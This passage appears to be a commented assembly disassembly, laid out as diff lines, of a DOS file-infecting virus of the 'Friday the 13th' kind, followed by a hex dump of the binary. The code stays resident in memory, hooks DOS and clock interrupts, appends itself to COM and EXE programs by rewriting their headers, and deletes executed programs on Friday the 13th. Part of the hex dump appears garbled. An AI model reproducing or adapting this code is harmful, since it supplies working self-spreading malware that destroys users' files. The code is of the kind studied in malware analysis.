+ INT 21H ;MODIFY ALLOCATED MEMORY BLOCKS + ; + MOV AX,3521 ; + INT 21H ;GET VECTOR + MOV CS:[OLD_21],BX ; + MOV CS:[OLD_21+2],ES ; + ; + PUSH CS ;0181 0E + POP DS ;0182 1F + MOV DX,offset NEW_INT_21 ;0183 BA5B02 + MOV AX,2521 ; + INT 21H ;SAVE VECTOR + ; + MOV ES,[A0031] ;018B 8E063100 + MOV ES,ES:[A002C] ;018F 268E062C00 + XOR DI,DI ;0194 33FF + MOV CX,7FFFH ;0196 B9FF7F + XOR AL,AL ;0199 32C0 + REPNE SCASB ;019C AE + CMP ES:[DI],AL ;019D 263805 + LOOPNZ 019B ;01A0 E0F9 + MOV DX,DI ;01A2 8BD7 + ADD DX,+03 ;01A4 83C203 + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + PUSH ES ; + POP DS ; + PUSH CS ; + POP ES ; + MOV BX,35H ; + ; + PUSH DS ;01B1 ; + PUSH ES ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + ; + MOV AH,2AH ; + INT 21H ;GET DATE + ; + MOV Byte ptr CS:[TIME_BOMB],0 ;SET "DONT DIE" + ; + CMP CX,1987 ;IF 1987... + JE L01F7 ;...JUMP + CMP AL,5 ;IF NOT FRIDAY... + JNE L01D8 ;...JUMP + CMP DL,0DH ;IF DATE IS NOT THE 13th... + JNE L01D8 ;...JUMP + INC Byte ptr CS:[TIME_BOMB] ;TIC THE BOMB COUNT + JMP L01F7 ; + ; +L01D8: MOV AX,3508H ;GET CLOCK TIMER VECTOR + INT 21H ;GET VECTOR + MOV CS:[OLD_08],BX ; + MOV CS:[OLD_08],ES ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV Word ptr [A_FLAG],7E90H ; + ; + MOV AX,2508H ;SET NEW CLOCK TIC HANDLER + MOV DX,offset NEW_08 ; + INT 21H ;SET VECTOR + ; +L01F7: POP DX ; + POP CX ; + POP BX ; + POP AX ; + POP ES ; + POP DS ; + PUSHF ; + CALL far CS:[OLD_21] ; + PUSH DS ; + POP ES ; + ; + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; + MOV AH,4DH ; + INT 21H ;GET RETURN CODE OF A SUBPROCESS + ; +;---------------------------------------; +; THIS IS WHERE WE REMAIN RESIDENT ; +;---------------------------------------; + MOV AH,31H ; + MOV DX,0600H ;020F ; + MOV CL,04 ; + SHR DX,CL ; + ADD DX,10H ; + INT 21H ;TERMINATE AND REMAIN RESIDENT + ; +;---------------------------------------; +NEW_24: XOR AL,AL ;021B ;CRITICAL ERROR HANDLER + IRET ; + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 08 (CLOCK TIC) HANDLER ; +;-----------------------------------------------------------------------; +NEW_08: CMP Word ptr CS:[A_FLAG],2 ;021E + JNE N08_10 ;IF ... JUMP + ; + PUSH AX ; + PUSH BX ; + PUSH CX ; + PUSH DX ; + PUSH BP ; + MOV AX,0602H ;SCROLL UP TWO LINES + MOV BH,87H ;INVERSE VIDEO ATTRIBUTE + MOV CX,0505H ;UPPER LEFT CORNER + MOV DX,1010H ;LOWER RIGHT CORNER + INT 10H ; + POP BP ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + ; +N08_10: DEC Word ptr CS:[A_FLAG] ;ASSURE THAT THIS ONLY HAPPENS ONCE + JNZ N08_90 ; BY RESETTING TO 1 IF EQUAL TO ZERO + MOV Word ptr CS:[A_FLAG],1 ; + ; + PUSH AX ;????? IS THIS SOME KIND OF DELAY ????? + PUSH CX ; + PUSH SI ; + MOV CX,4001H ; + REP LODSB ; + POP SI ; + POP CX ; + POP AX ; + ; +N08_90: JMP far CS:[OLD_08] ;PASS CONTROL TO OLD INT 08 VECTOR + ; +;-----------------------------------------------------------------------; +; NEW INTERRUPT 21 HANDLER ; +;-----------------------------------------------------------------------; +NEW_21: PUSHF ;025B ; + CMP AH,0E0H ;IF A E0 REQUEST... + JNE N21_10 ; + MOV AX,300H ;...RETURN AX = 300H + POPF ; (OUR PUSHF) + IRET ; + ; +N21_10: CMP AH,0DDH ;0266 ; + JE N21_30 ;IF DDH...JUMP TO _30 + CMP AH,0DEH ; + JE N21_40 ;IF DEH...JUMP TO _40 + CMP AX,4B00H ;IF SPAWN A PROG... + JNE N21_20 ; + JMP N21_50 ;...JUMP TO _50 + ; +N21_20: POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;ANY OTHER INT 21 GOES TO OLD VECTOR + ; +N21_30: POP AX ;REMOVE OUR (PUSHF) + POP AX ;? + MOV AX,100H ; + MOV CS:[000A],AX ; + POP AX ; + MOV CS:[000C],AX ; + REP MOVSB ; + POPF ; (OUR PUSHF) + MOV AX,CS:[000F] ; + JMP far CS:[000A] ; + ; +N21_40: ADD SP,+06 ;0298 ; + POPF ; (OUR PUSHF) + MOV AX,CS ; + MOV SS,AX ; + MOV SP,710H ;SIZE OF VIRUS CODE + PUSH ES ; + PUSH ES ;02A4 06 + XOR DI,DI ;02A5 33FF + PUSH CS ;02A7 0E + POP ES ;02A8 07 + MOV CX,0010 ;02A9 B91000 + MOV SI,BX ;02AC 8BF3 + MOV DI,0021 ;02AE BF2100 + REP MOVSB ;02B2 A4 + MOV AX,DS ;02B3 8CD8 + MOV ES,AX ;02B5 8EC0 + MUL Word ptr CS:[A007A] ;02B7 2EF7267A00 + ADD AX,CS:[002B] ;02BC 2E03062B00 + ADC DX,+00 ;02C1 83D200 + DIV Word ptr CS:[A007A] ;02C4 2EF7367A00 + MOV DS,AX ;02C9 8ED8 + MOV SI,DX ;02CB 8BF2 + MOV DI,DX ;02CD 8BFA + MOV BP,ES ;02CF 8CC5 + MOV BX,CS:[002F] ;02D1 2E8B1E2F00 + OR BX,BX ;02D6 0BDB + JE 02ED ;02D8 7413 + MOV CX,8000 ;02DA B90080 + REP MOVSW ;02DE A5 + ADD AX,1000 ;02DF 050010 + ADD BP,1000 ;02E2 81C50010 + MOV DS,AX ;02E6 8ED8 + MOV ES,BP ;02E8 8EC5 + DEC BX ;02EA 4B + JNE 02DA ;02EB 75ED + MOV CX,CS:[002D] ;02ED 2E8B0E2D00 + REP MOVSB ;02F3 A4 + POP AX ;02F4 58 + PUSH AX ;02F5 50 + ADD AX,0010 ;02F6 051000 + ADD CS:[0029],AX ;02F9 2E01062900 + ADD CS:[0025],AX ;02FE 2E01062500 + MOV AX,CS:[0021] ;0303 2EA12100 + POP DS ;0307 1F + POP ES ;0308 07 + MOV SS,CS:[0029] ;0309 2E8E162900 + MOV SP,CS:[0027] ;030E 2E8B262700 + JMP far CS:[0023] ;0313 2EFF2E2300 + ; +;---------------------------------------; +; IT IS TIME FOR THIS FILE TO DIE... ; +; THIS IS WHERE IT GETS DELETED ! ; +;---------------------------------------; +N21_5A: XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE (ATT=0) + ; + MOV AH,41H ; + INT 21H ;DELETE A FILE + ; + MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ; + ; +;---------------------------------------; +; START INFECTION ; +;---------------------------------------; +N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE... + JE N21_5A ;...JUMP + ; + MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN + MOV Word ptr CS:[A008F],0 ; + MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME + MOV word ptr CS:[HOST_NAME+2],DS ; + ; +;INFECT PROCESS SEEMS TO OCCUR HERE ; + PUSH AX ;034C 50 + PUSH BX ;034D 53 + PUSH CX ;034E 51 + PUSH DX ;034F 52 + PUSH SI ;0350 56 + PUSH DI ;0351 57 + PUSH DS ;0352 1E + PUSH ES ;0353 06 + CLD ;0354 FC + MOV DI,DX ;0355 8BFA + XOR DL,DL ;0357 32D2 + CMP Byte ptr [DI+01],3A ;0359 807D013A + JNE L0364 ;035D 7505 + MOV DL,[DI] ;035F 8A15 + AND DL,1F ;0361 80E21F + ; +L0364: MOV AH,36 ; + INT 21H ;GET DISK FREE SPACE + CMP AX,-1 ;0368 3DFFFF + JNE L0370 ;036B 7503 +L036D: JMP I_90 ;036D E97702 + ; +L0370: MUL BX ;0370 F7E3 + MUL CX ;0372 F7E1 + OR DX,DX ;0374 0BD2 + JNE L037D ;0376 7505 + CMP AX,710H ;0378 3D1007 + JC L036D ;037B 72F0 +L037D: MOV DX,word ptr CS:[HOST_NAME] + PUSH DS ;0382 1E + POP ES ;0383 07 + XOR AL,AL ;0384 32C0 + MOV CX,41 ;0386 B94100 + REPNE SCASB ;038A AE + MOV SI,word ptr CS:[HOST_NAME] +L0390: MOV AL,[SI] ;0390 8A04 + OR AL,AL ;0392 0AC0 + JE L03A4 ;0394 740E + CMP AL,61 ;0396 3C61 + JC L03A1 ;0398 7207 + CMP AL,7A ;039A 3C7A + JA L03A1 ;039C 7703 + SUB Byte ptr [SI],20 ;039E 802C20 +L03A1: INC SI ;03A1 46 + JMP L0390 ;03A2 EBEC + ; +L03A4: MOV CX,000B ;03A4 B90B00 + SUB SI,CX ;03A7 2BF1 + MOV DI,offset COMMAND_COM ;03A9 BF8400 + PUSH CS ;03AC 0E + POP ES ;03AD 07 + MOV CX,000B ;03AE B90B00 + REPE CMPSB ;03B2 A6 + JNE L03B8 ;03B3 7503 + JMP I_90 ;03B5 E92F02 + ; +L03B8: MOV AX,4300H ; + INT 21H ;CHANGE FILE MODE + JC L03C4 ;03BD 7205 + ; + MOV CS:[HOST_ATT],CX ;03BF ; +L03C4: JC L03EB ;03C4 7225 + XOR AL,AL ;03C6 32C0 + MOV CS:[A004E],AL ;03C8 2EA24E00 + PUSH DS ;03CC 1E + POP ES ;03CD 07 + MOV DI,DX ;03CE 8BFA + MOV CX,41 ;03D0 B94100 + REPNZ SCASB ;03D4 AE + CMP Byte ptr [DI-02],4D ;03D5 807DFE4D + JE L03E6 ;03D9 740B + CMP Byte ptr [DI-02],6D ;03DB 807DFE6D + JE L03E6 ;03DF 7405 + INC Byte ptr CS:[A004E] ;03E1 2EFE064E00 + ; +L03E6: MOV AX,3D00H ; + INT 21H ;OPEN FILE READ ONLY +L03EB: JC L0447 ; + MOV CS:[HANDLE],AX ;03ED ; + ; + MOV BX,AX ;MOVE TO END OF FILE -5 + MOV AX,4202 ; + MOV CX,-1 ;FFFFFFFB + MOV DX,-5 ; + INT 21H ;MOVE FILE POINTER + JC L03EB ; + ; + ADD AX,5 ;0400 ; + MOV CS:[A0011],AX ;?SAVE HOST SIZE + ; + MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST + MOV DX,offset A006B ; + MOV AX,CS ; + MOV DS,AX ; + MOV ES,AX ; + MOV AH,3FH ; + INT 21H ;READ FROM A FILE + ; + MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos' + MOV SI,offset MS_DOS ; + REPE CMPSB ; + JNE L0427 ; + MOV AH,3E ;IF == 'MsDos'... + INT 21H ;CLOSE FILE + JMP I_90 ;...PASS CONTROL TO DOS + ; +L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR + INT 21H ;GET VECTOR + MOV [OLD_24],BX ; + MOV [OLD_24+2],ES ; + ; + MOV DX,offset NEW_24 ; + MOV AX,2524 ;SET CRITICAL ERROR VECTOR + INT 21H ;SET VECTOR + ; + LDS DX,dword ptr [HOST_NAME]; + XOR CX,CX ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE +L0447: JC L0484 ; + ; + MOV BX,CS:[HANDLE] ; + MOV AH,3E ; + INT 21H ;CLOSE FILE + ; + MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE + ; + MOV AX,3D02 ; + INT 21H ;OPEN FILE R/W + JC L0484 ; + ; + MOV CS:[HANDLE],AX ;0460 2EA37000 + MOV AX,CS ;0464 8CC8 + MOV DS,AX ;0466 8ED8 + MOV ES,AX ;0468 8EC0 + MOV BX,[HANDLE] ;046A 8B1E7000 + MOV AX,5700 ;046E B80057 + INT 21H ;GET/SET FILE DATE TIME + ; + MOV [HOST_DATE],DX ;0473 89167400 + MOV [HOST_TIME],CX ;0477 890E7600 + MOV AX,4200 ;047B B80042 + XOR CX,CX ;047E 33C9 + MOV DX,CX ;0480 8BD1 + INT 21H ;MOVE FILE POINTER +L0484: JC L04C3 ;0484 723D + ; + CMP Byte ptr [A004E],00 ;0486 803E4E0000 + JE L0490 ;048B 7403 + JMP L04E6 ;048D EB57 + ; + NOP ;048F 90 +L0490: MOV BX,1000 ;0490 BB0010 + MOV AH,48 ;0493 B448 + INT 21H ;ALLOCATE MEMORY + JNC L04A4 ;0497 730B + ; + MOV AH,3E ;0499 B43E + MOV BX,[HANDLE] ;049B 8B1E7000 + INT 21H ;CLOSE FILE + JMP I_90 ;04A1 E94301 + ; +L04A4: INC Word ptr [A008F] ;04A4 FF068F00 + MOV ES,AX ;04A8 8EC0 + XOR SI,SI ;04AA 33F6 + MOV DI,SI ;04AC 8BFE + MOV CX,710H ;04AE B91007 + REP MOVSB ;04B2 A4 + MOV DX,DI ;04B3 8BD7 + MOV CX,[A0011] ;?GET HOST SIZE + MOV BX,[70H] ;04B9 8B1E7000 + PUSH ES ;04BD 06 + POP DS ;04BE 1F + MOV AH,3FH ;04BF B43F + INT 21H ;READ FROM A FILE +L04C3: JC L04E1 ;04C3 721C + ; + ADD DI,CX ;04C5 03F9 + ; + XOR CX,CX ;POINT TO BEGINNING OF FILE + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER + ; + MOV SI,offset MS_DOS ;04D0 BE0500 + MOV CX,5 ;04D3 B90500 + REP CS:MOVSB ;04D7 2EA4 + MOV CX,DI ;04D9 8BCF + XOR DX,DX ;04DB 33D2 + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L04E1: JC L04F0 ; + JMP L05A2 ; + ; +;---------------------------------------; +; READ EXE HEADER ; +;---------------------------------------; +L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER + MOV DX,offset EXE_HDR ; + MOV AH,3F ; + INT 21H ;READ FILE + JC L053C ; + ; +;---------------------------------------; +; TWEEK EXE HEADER TO INFECTED HSOT ; +;---------------------------------------; + MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO + MOV AX,[EXE_HDR+14] ; SS + MOV [HOST_SS],AX ; + MOV AX,[EXE_HDR+16] ; SP + MOV [HOST_SP],AX ; + MOV AX,[EXE_HDR+20] ; IP + MOV [HOST_IP],AX ; + MOV AX,[EXE_HDR+22] ; CS + MOV [HOST_CS],AX ; + MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS) + CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512 + JZ L051B ;IF FILE SIZE==0...JMP + DEC AX ; +L051B: MUL Word ptr [BLOCK_SIZE] ; + ADD AX,[EXE_HDR+2] ; + ADC DX,0 ;AX NOW = FILE SIZE + ; + ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND + ADC DX,0 ; + AND AX,0FFF0H ; + MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS + MOV [HOST_SIZE+2],DX ; + ; + ADD AX,710H ;(SIZE OF VIRUS) + ADC DX,0 ; +L053C: JC L0578 ;IF > FFFFFFFF...JMP + DIV Word ptr [BLOCK_SIZE] ; + OR DX,DX ; + JE L0547 ; + INC AX ; +L0547: MOV [EXE_HDR+4],AX ; + MOV [EXE_HDR+2],DX ; + ;---------------; + MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE + MOV DX,[HOST_SIZE+2] ; + DIV Word ptr [A007A] ; + SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR + MOV [EXE_HDR+22],AX ;VALUE OF CS + MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP + MOV [EXE_HDR+14],AX ;VALUE OF SS + MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP + ;---------------; + XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR) + MOV DX,CX ; + MOV AX,4200H ; + INT 21H ;MOVE FILE POINTER +L0578: JC L0584 ; + ; +;---------------------------------------; +; WRITE INFECTED EXE HEADER ; +;---------------------------------------; + MOV CX,1CH ; + MOV DX,offset EXE_HDR ; + MOV AH,40H ; + INT 21H ;WRITE TO A FILE +L0584: JC L0597 ; + CMP AX,CX ; + JNE L05A2 ; + ; + MOV DX,[HOST_SIZE] ;POINT TO END OF FILE + MOV CX,[HOST_SIZE+2] ; + MOV AX,4200 ; + INT 21H ;MOVE FILE POINTER +L0597: JC L05A2 ; + ; +;---------------------------------------; +; WRITE VIRUS CODE TO END OF HOST ; +;---------------------------------------; + XOR DX,DX ; + MOV CX,710H ;(SIZE OF VIRUS) + MOV AH,40H ; + INT 21H ;WRITE TO A FILE + ; +L05A2: CMP Word ptr CS:[008F],0 ;IF... + JZ L05AE ;...SKIP + MOV AH,49H ; + INT 21H ;FREE ALLOCATED MEMORY + ; +L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ... + JE I_90 ;...SKIP + ; + MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME + MOV DX,CS:[HOST_DATE] ; + MOV CX,CS:[HOST_TIME] ; + MOV AX,5701H ; + INT 21H ;GET/SET FILE DATE/TIME + ; + MOV AH,3EH ; + INT 21H ;CLOSE FILE + ; + LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE + MOV CX,CS:[HOST_ATT] ; + MOV AX,4301H ; + INT 21H ;CHANGE FILE MODE + ; + LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER + MOV AX,2524H ; + INT 21H ;SET VECTOR + ; +I_90: POP ES ; + POP DS ; + POP DI ; + POP SI ; + POP DX ; + POP CX ; + POP BX ; + POP AX ; + POPF ; (OUR PUSHF) + JMP far CS:[OLD_21] ;PASS CONTROL TO DOS + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +;0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 15 18 00 00 i..sUMsDos...... +;0110 00 00 01 A5 FE 00 F0 60-14 4E 02 56 05 A5 16 48 ...%~.p`.N.V.%.H +;0120 7E 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ~............... +;0130 00 8E 17 80 00 00 00 80-00 8E 17 5C 00 8E 17 6C ...........\...l +;0140 00 8E 17 10 07 7A 34 C5-00 7A 34 10 F0 82 00 4D .....z4E.z4.p..M +;0150 5A D0 00 98 00 31 00 20-00 11 00 FF FF 5C 12 10 ZP...1. .....\.. +;0160 07 84 19 C5 00 5C 12 20-00 00 00 C3 C3 C3 C3 C3 ...E.\. ...CCCCC +;0170 05 00 20 00 21 00 2D 00-00 02 10 00 C0 27 01 00 .. .!.-.....@'.. +;0180 D9 41 28 9B 43 4F 4D 4D-41 4E 44 2E 43 4F 4D 01 YA(.COMMAND.COM. +;0190 00 00 00 00 00 FC B4 E0-CD 21 80 FC E0 73 16 80 .....|4`M!.|`s.. +;01A0 FC 03 72 11 B4 DD BF 00-01 BE 10 07 03 F7 2E 8B |.r.4]?..>...w.. +;01B0 8D 11 00 CD 21 8C C8 05-10 00 8E D0 BC 00 07 50 ...M!.H....P<..P +;01C0 B8 C5 00 50 CB FC 06 2E-8C 06 31 00 2E 8C 06 39 8E.PK|....1....9 +;01D0 00 2E 8C 06 3D 00 2E 8C-06 41 00 8C C0 05 10 00 ....=....A..@... +;01E0 2E 01 06 49 00 2E 01 06-45 00 B4 E0 CD 21 80 FC ...I....E.4`M!.| +;01F0 E0 73 13 80 FC 03 07 2E-8E 16 45 00 2E 8B 26 43 `s..|.....E...&C +;0200 00 2E FF 2E 47 00 33 C0-8E C0 26 A1 FC 03 2E A3 ....G.3@.@&!|..# +;0210 4B 00 26 A0 FE 03 2E A2-4D 00 26 C7 06 FC 03 F3 K.& ~.."M.&G.|.s +;0220 A5 26 C6 06 FE 03 CB 58-05 10 00 8E C0 0E 1F B9 %&F.~.KX....@..9 +;0230 10 07 D1 E9 33 F6 8B FE-06 B8 42 01 50 EA FC 03 ..Qi3v.~.8B.Pj|. +;0240 00 00 8C C8 8E D0 BC 00-07 33 C0 8E D8 2E A1 4B ...H.P<..3@.X.!K +;0250 00 A3 FC 03 2E A0 4D 00-A2 FE 03 8B DC B1 04 D3 .#|.. M."~..\1.S +;0260 EB 83 C3 10 2E 89 1E 33-00 B4 4A 2E 8E 06 31 00 k.C....3.4J...1. +;0270 CD 21 B8 21 35 CD 21 2E-89 1E 17 00 2E 8C 06 19 M!8!5M!......... +;0280 00 0E 1F BA 5B 02 B8 21-25 CD 21 8E 06 31 00 26 ...:[.8!%M!..1.& +;0290 8E 06 2C 00 33 FF B9 FF-7F 32 C0 F2 AE 26 38 05 ..,.3.9..2@r.&8. +;02A0 E0 F9 8B D7 83 C2 03 B8-00 4B 06 1F 0E 07 BB 35 `y.W.B.8.K....;5 +;02B0 00 1E 06 50 53 51 52 B4-2A CD 21 2E C6 06 0E 00 ...PSQR4*M!.F... +;02C0 00 81 F9 C3 07 74 30 3C-05 75 0D 80 FA 0D 75 08 ..yC.t0<.u..z.u. +;02D0 2E FE 06 0E 00 EB 20 90-B8 08 35 CD 21 2E 89 1E .~...k .8.5M!... +;02E0 13 00 2E 8C 06 15 00 0E-1F C7 06 1F 00 90 7E B8 .........G....~8 +;02F0 08 25 BA 1E 02 CD 21 5A-59 5B 58 07 1F 9C 2E FF .%:..M!ZY[X..... +;0300 1E 17 00 1E 07 B4 49 CD-21 B4 4D CD 21 B4 31 BA .....4IM!4MM!41: +;0310 00 06 B1 04 D3 EA 83 C2-10 CD 21 32 C0 CF 2E 83 ..1.Sj.B.M!2@O.. +;0320 3E 1F 00 02 75 17 50 53-51 52 55 B8 02 06 B7 87 >...u.PSQRU8..7. +;0330 B9 05 05 BA 10 10 CD 10-5D 5A 59 5B 58 2E FF 0E 9..:..M.]ZY[X... +;0340 1F 00 75 12 2E C7 06 1F-00 01 00 50 51 56 B9 01 ..u..G.....PQV9. +;0350 40 F3 AC 5E 59 58 2E FF-2E 13 00 9C 80 FC E0 75 @s,^YX.......|`u +;0360 05 B8 00 03 9D CF 80 FC-DD 74 13 80 FC DE 74 28 .8...O.|]t..|^t( +;0370 3D 00 4B 75 03 E9 B4 00-9D 2E FF 2E 17 00 58 58 =.Ku.i4.......XX +;0380 B8 00 01 2E A3 0A 00 58-2E A3 0C 00 F3 A4 9D 2E 8...#..X.#..s$.. +;0390 A1 0F 00 2E FF 2E 0A 00-83 C4 06 9D 8C C8 8E D0 !........D...H.P +;03A0 BC 10 07 06 06 33 FF 0E-07 B9 10 00 8B F3 BF 21 <....3...9...s?! +;03B0 00 F3 A4 8C D8 8E C0 2E-F7 26 7A 00 2E 03 06 2B .s$.X.@.w&z....+ +;03C0 00 83 D2 00 2E F7 36 7A-00 8E D8 8B F2 8B FA 8C ..R..w6z..X.r.z. +;03D0 C5 2E 8B 1E 2F 00 0B DB-74 13 B9 00 80 F3 A5 05 E.../..[t.9..s%. +;03E0 00 10 81 C5 00 10 8E D8-8E C5 4B 75 ED 2E 8B 0E ...E...X.EKum... +;03F0 2D 00 F3 A4 58 50 05 10-00 2E 01 06 29 00 2E 01 -.s$XP......)... +;0400 06 25 00 2E A1 21 00 1F-07 2E 8E 16 29 00 2E 8B .%..!!......)... +;0410 26 27 00 2E FF 2E 23 00-33 C9 B8 01 43 CD 21 B4 &'....#.3I8.CM!4 +;0420 41 CD 21 B8 00 4B 9D 2E-FF 2E 17 00 2E 80 3E 0E AM!8.K........>. +;0430 00 01 74 E4 2E C7 06 70-00 FF FF 2E C7 06 8F 00 ..td.G.p....G... +;0440 00 00 2E 89 16 80 00 2E-8C 1E 82 00 50 53 51 52 ............PSQR +;0450 56 57 1E 06 FC 8B FA 32-D2 80 7D 01 3A 75 05 8A VW..|.z2R.}.:u.. +;0460 15 80 E2 1F B4 36 CD 21-3D FF FF 75 03 E9 77 02 ..b.46M!=..u.iw. +;0470 F7 E3 F7 E1 0B D2 75 05-3D 10 07 72 F0 2E 8B 16 wcwa.Ru.=..rp... +;0480 80 00 1E 07 32 C0 B9 41-00 F2 AE 2E 8B 36 80 00 ....2@9A.r...6.. +;0490 8A 04 0A C0 74 0E 3C 61-72 07 3C 7A 77 03 80 2C ...@t...s&u. +;0520 B4 3E CD 21 E9 C0 01 B8-24 35 CD 21 89 1E 1B 00 4>M!i@.8$5M!.... +;0530 8C 06 1D 00 BA 1B 02 B8-24 25 CD 21 C5 16 80 00 ....:..8$%M!E... +;0540 33 C9 B8 01 43 CD 21 72-3B 2E 8B 1E 70 00 B4 3E 3I8.CM!r;...p.4> +;0550 CD 21 2E C7 06 70 00 FF-FF B8 02 3D CD 21 72 24 M!.G.p...8.=M!r$ +;0560 2E A3 70 00 8C C8 8E D8-8E C0 8B 1E 70 00 B8 00 .#p..H.X.@..p.8. +;0570 57 CD 21 89 16 74 00 89-0E 76 00 B8 00 42 33 C9 WM!..t...v.8.B3I +;0580 8B D1 CD 21 72 3D 80 3E-4E 00 00 74 03 EB 57 90 .QM!r=.>N..t.kW. +;0590 BB 00 10 B4 48 CD 21 73-0B B4 3E 8B 1E 70 00 CD ;..4HM!s.4>..p.M +;05A0 21 E9 43 01 FF 06 8F 00-8E C0 33 F6 8B FE B9 10 !iC......@3v.~9. +;05B0 07 F3 A4 8B D7 8B 0E 11-00 8B 1E 70 00 06 1F B4 .s$.W......p...4 +;05C0 3F CD 21 72 1C 03 F9 33-C9 8B D1 B8 00 42 CD 21 ?M!r..y3I.Q8.BM! +;05D0 BE 05 00 B9 05 00 F3 2E-A4 8B CF 33 D2 B4 40 CD >..9..s.$.O3R4@M +;05E0 21 72 0D E9 BC 00 B9 1C-00 BA 4F 00 B4 3F CD 21 !r.i<.9..:O.4?M! +;05F0 72 4A C7 06 61 00 84 19-A1 5D 00 A3 45 00 A1 5F rJG.a...!].#E.!_ +;0600 00 A3 43 00 A1 63 00 A3-47 00 A1 65 00 A3 49 00 .#C.!c.#G.!e.#I. +;0610 A1 53 00 83 3E 51 00 00-74 01 48 F7 26 78 00 03 !S..>Q..t.Hw&x.. +;0620 06 51 00 83 D2 00 05 0F-00 83 D2 00 25 F0 FF A3 .Q..R.....R.%p.# +;0630 7C 00 89 16 7E 00 05 10-07 83 D2 00 72 3A F7 36 |...~.....R.r:w6 +;0640 78 00 0B D2 74 01 40 A3-53 00 89 16 51 00 A1 7C x..Rt.@#S...Q.!| +;0650 00 8B 16 7E 00 F7 36 7A-00 2B 06 57 00 A3 65 00 ...~.w6z.+.W.#e. +;0660 C7 06 63 00 C5 00 A3 5D-00 C7 06 5F 00 10 07 33 G.c.E.#].G._...3 +;0670 C9 8B D1 B8 00 42 CD 21-72 0A B9 1C 00 BA 4F 00 I.Q8.BM!r.9..:O. +;0680 B4 40 CD 21 72 11 3B C1-75 18 8B 16 7C 00 8B 0E 4@M!r.;Au...|... +;0690 7E 00 B8 00 42 CD 21 72-09 33 D2 B9 10 07 B4 40 ~.8.BM!r.3R9..4@ +;06A0 CD 21 2E 83 3E 8F 00 00-74 04 B4 49 CD 21 2E 83 M!..>...t.4IM!.. +;06B0 3E 70 00 FF 74 31 2E 8B-1E 70 00 2E 8B 16 74 00 >p..t1...p....t. +;06C0 2E 8B 0E 76 00 B8 01 57-CD 21 B4 3E CD 21 2E C5 ...v.8.WM!4>M!.E +;06D0 16 80 00 2E 8B 0E 72 00-B8 01 43 CD 21 2E C5 16 ......r.8.CM!.E. +;06E0 1B 00 B8 24 25 CD 21 07-1F 5F 5E 5A 59 5B 58 9D ..8$%M!.._^ZY[X. +;06F0 2E FF 2E 17 00 00 00 00-00 00 00 00 00 00 00 00 ................ +;0700 4D 00 00 0F 00 00 00 00-00 00 00 00 00 00 00 00 M............... +;0710 CD 20 0B 1B 00 9A F0 FE-1D F0 2F 01 0E 0A 3C 01 M ....p~.p/...<. +;0720 0E 0A EB 04 0E 0A 0E 0A-01 01 01 00 02 FF FF FF ..k............. +;0730 FF FF FF FF FF FF FF FF-FF FF FF FF DD 0A 0C 16 ............]... +;0740 52 0B 14 00 18 00 52 0B-FF FF FF FF 00 00 00 00 R.....R......... +;0750 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ +;0760 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 M!K.......... +;0770 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 ..... +;0780 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........ +;0790 00 0D 62 3A 0D 62 6F 2E-2A 20 62 3A 0D 00 00 00 ..b:.bo.* b:.... +;07A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 01 00 ................ +;07B0 17 D0 01 00 01 00 17 D0-01 00 01 00 17 D0 02 00 .P.....P.....P.. +;07C0 01 00 17 D0 02 00 01 00-87 CF 00 00 05 00 FF FF ...P.....O...... +;07D0 EA CF 01 00 17 D0 07 00-01 00 6C 15 08 25 A5 FE jO...P....l..%%~ +;07E0 BC 07 1E 02 10 07 6C 15-8E 17 2F 01 04 7F 70 00 <.....l.../...p. +;07F0 10 07 40 00 82 08 88 17-A5 16 1B 02 8E 17 02 02 ..@.....%....... +;0800 4D 15 18 05 00 00 00 00-00 00 00 00 00 00 00 00 M............... +;<<<<<<<<<< ORIGINAL CODE BEGINS HERE +;0810 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0820 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 